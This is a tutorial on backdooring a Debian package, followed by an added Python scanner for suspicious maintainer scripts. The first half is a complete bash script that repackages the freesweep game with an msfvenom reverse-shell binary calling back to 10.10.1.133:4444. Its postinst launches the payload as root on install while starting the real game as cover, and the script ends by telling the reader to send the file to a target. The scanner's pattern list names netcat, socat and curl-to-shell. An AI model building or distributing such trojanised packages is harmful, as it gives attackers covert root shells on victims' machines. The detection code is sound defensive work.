Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system.
Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts.
First we need to locate a DEB package to infect with our payload. Everything is staged under a temp folder (/tmp/evil). I've automated the process in a small bash script that downloads the genuine package, unpacks it, drops a reverse-shell binary into it, adds a postinst maintainer script that launches that binary, and rebuilds the DEB. We send the result to the user, and when the user installs it, dpkg runs postinst as root and the payload connects back.

Build backdoor DEB:

```bash
#!/bin/bash
# Stage everything under /tmp/evil.
mkdir -p /tmp/evil
cd /tmp/evil

# Fetch the genuine package without installing it (lands in the apt cache).
# If freesweep is already installed, add --reinstall so apt actually downloads it.
sudo apt-get --download-only install freesweep
sudo mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb /tmp/evil

# Unpack the package contents into a working tree and add the control directory.
dpkg -x freesweep_1.0.2-1_amd64.deb work
mkdir work/DEBIAN
cd work/DEBIAN

# Define the content of the control file and create the file.
# Architecture and Version match the downloaded amd64 package and the x64 payload
# built below; an i386 control file would make dpkg refuse to install on amd64.
cat <<EOL > control
Package: freesweep
Version: 1.0.2-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
 Freesweep is an implementation of the popular minesweeper game, where
 one tries to find all the mines without igniting any, based on hints given
 by the computer. Unlike most implementations of this game, Freesweep
 works in any visual text display - in Linux console, in an xterm, and in
 most text-based terminals currently in use.
EOL
# Notify the user that the file has been created
echo "The control file has been created and populated."

# Now build a postinst file. dpkg runs it as root after unpacking: it marks the
# payload setgid, launches it in the background, then starts the real game so
# nothing looks wrong to the user.
cat <<EOL > postinst
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
EOL
# Tell user files are built
echo "Files built successfully"

# Build the payload: a reverse shell dropped alongside the real game binary.
msfvenom --platform linux -a x64 --payload linux/x64/shell_reverse_tcp LHOST=10.10.1.133 LPORT=4444 -b "\x00" -f elf -o /tmp/evil/work/usr/games/freesweep_scores
echo "Payload has been built"

# Maintainer scripts must be executable or dpkg-deb rejects the package.
chmod 755 postinst

# Build the package (writes /tmp/evil/work.deb). --root-owner-group avoids
# shipping files owned by the build user, which would stand out on the target.
dpkg-deb --root-owner-group --build /tmp/evil/work

# Move back 2 directories to /tmp/evil
cd ../..
# Rename file to whatever "freesweep" here
mv work.deb freesweep.deb
echo "All files created send target file FREESWEEP.DEB"
```
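The receiving side's counterpart, added here as an example and not code from the original tutorial: a pre-install check that parses the .deb container (an ar archive holding control.tar and data.tar) with Python's standard library, pulls out the maintainer scripts and flags the indicators this kind of backdoor leaves behind (a chmod that sets setuid/setgid bits, a packaged binary launched in the background, socket primitives, download-and-pipe-to-shell, base64 decoding). The sample packages are constructed inline to mirror the postinst above; the heuristic patterns, the builder helpers and the function names are this example's own choices, not a dpkg API.

```python
"""Scan a .deb for maintainer-script persistence indicators (added example)."""
import io
import re
import tarfile

MAINT_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")

# Heuristics chosen for this example, not a complete ruleset.
SUSPICIOUS = [
    (re.compile(r"chmod\s+[0-9]*[2467][0-7]{3}\b"), "chmod sets setuid/setgid bits"),
    (re.compile(r"chmod\s+\S*[ug]\+s"), "chmod sets setuid/setgid bits"),
    (re.compile(r"/dev/tcp/|\bnc\b|\bncat\b|\bsocat\b"), "network socket primitive"),
    (re.compile(r"(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b"), "download piped to shell"),
    (re.compile(r"base64\s+(-d|--decode)"), "base64 decode of embedded content"),
    (re.compile(r"\S+\s+&\s*$", re.M), "process left running in background"),
]


def _ar_members(blob: bytes):
    """Yield (name, payload) for each member of an ar archive (the .deb container)."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("bad ar member header")
        name = hdr[0:16].decode().rstrip().rstrip("/")   # GNU ar appends "/"
        size = int(hdr[48:58].decode().strip())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)                     # members are 2-byte aligned


def scan_deb(blob: bytes):
    """Return a list of (file, reason) findings for a .deb supplied as bytes."""
    findings = []
    members = dict(_ar_members(blob))
    control = next((v for k, v in members.items() if k.startswith("control.tar")), None)
    data = next((v for k, v in members.items() if k.startswith("data.tar")), None)
    if control is None or data is None:
        raise ValueError("missing control.tar or data.tar member")
    # Record what the package ships, and whether any of it is already setuid/setgid.
    shipped = set()
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for m in tf:
            path = "/" + m.name.lstrip("./")
            if m.isfile():
                shipped.add(path)
                if m.mode & 0o6000:
                    findings.append((path, "shipped file has setuid/setgid bit"))
    # Maintainer scripts run as root at install time: inspect each one.
    with tarfile.open(fileobj=io.BytesIO(control), mode="r:*") as tf:
        for m in tf:
            base = m.name.lstrip("./")
            if base not in MAINT_SCRIPTS or not m.isfile():
                continue
            text = tf.extractfile(m).read().decode(errors="replace")
            for pat, why in SUSPICIOUS:
                if pat.search(text):
                    findings.append((base, why))
            for path in sorted(shipped):
                # A packaged file started with a trailing single "&" (not "&&").
                if re.search(re.escape(path) + r"\s*&(?!&)", text):
                    findings.append((base, f"launches packaged file {path} in the background"))
    return findings


# --- constructed sample packages (builder helpers are this example's own) ---
def _ar_member(name: str, payload: bytes) -> bytes:
    hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(payload):<10}`\n".encode()
    return hdr + payload + (b"\n" if len(payload) & 1 else b"")


def _tar(files) -> bytes:
    """files: {path: (mode, content)} -> gzip tar bytes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, (mode, content) in files.items():
            ti = tarfile.TarInfo(path)
            ti.size, ti.mode = len(content), mode
            tf.addfile(ti, io.BytesIO(content))
    return buf.getvalue()


def build_deb(control_files, data_files) -> bytes:
    return (b"!<arch>\n" + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", _tar(control_files))
            + _ar_member("data.tar.gz", _tar(data_files)))


GAME = {"./usr/games/freesweep": (0o755, b"\x7fELF-game"),
        "./usr/games/freesweep_scores": (0o755, b"\x7fELF-payload")}
CONTROL = b"Package: freesweep\nVersion: 1.0.2-1\nArchitecture: amd64\n"
# Mirrors the postinst from the tutorial above.
BACKDOOR_POSTINST = (b"#!/bin/sh\nsudo chmod 2755 /usr/games/freesweep_scores && "
                     b"/usr/games/freesweep_scores & /usr/games/freesweep &\n")
BENIGN_POSTINST = b"#!/bin/sh\nset -e\nupdate-menus 2>/dev/null || true\n"


def malicious_deb() -> bytes:
    return build_deb({"./control": (0o644, CONTROL), "./postinst": (0o755, BACKDOOR_POSTINST)}, GAME)


def benign_deb() -> bytes:
    return build_deb({"./control": (0o644, CONTROL), "./postinst": (0o755, BENIGN_POSTINST)}, GAME)


if __name__ == "__main__":
    for label, deb in (("backdoored", malicious_deb()), ("benign", benign_deb())):
        print(label, scan_deb(deb))
```

Run it against a real package with `scan_deb(open("freesweep.deb", "rb").read())`; the same checks can be reproduced by hand with `dpkg-deb -e pkg.deb ctl && cat ctl/postinst` and `dpkg-deb -c pkg.deb` before ever running `dpkg -i`.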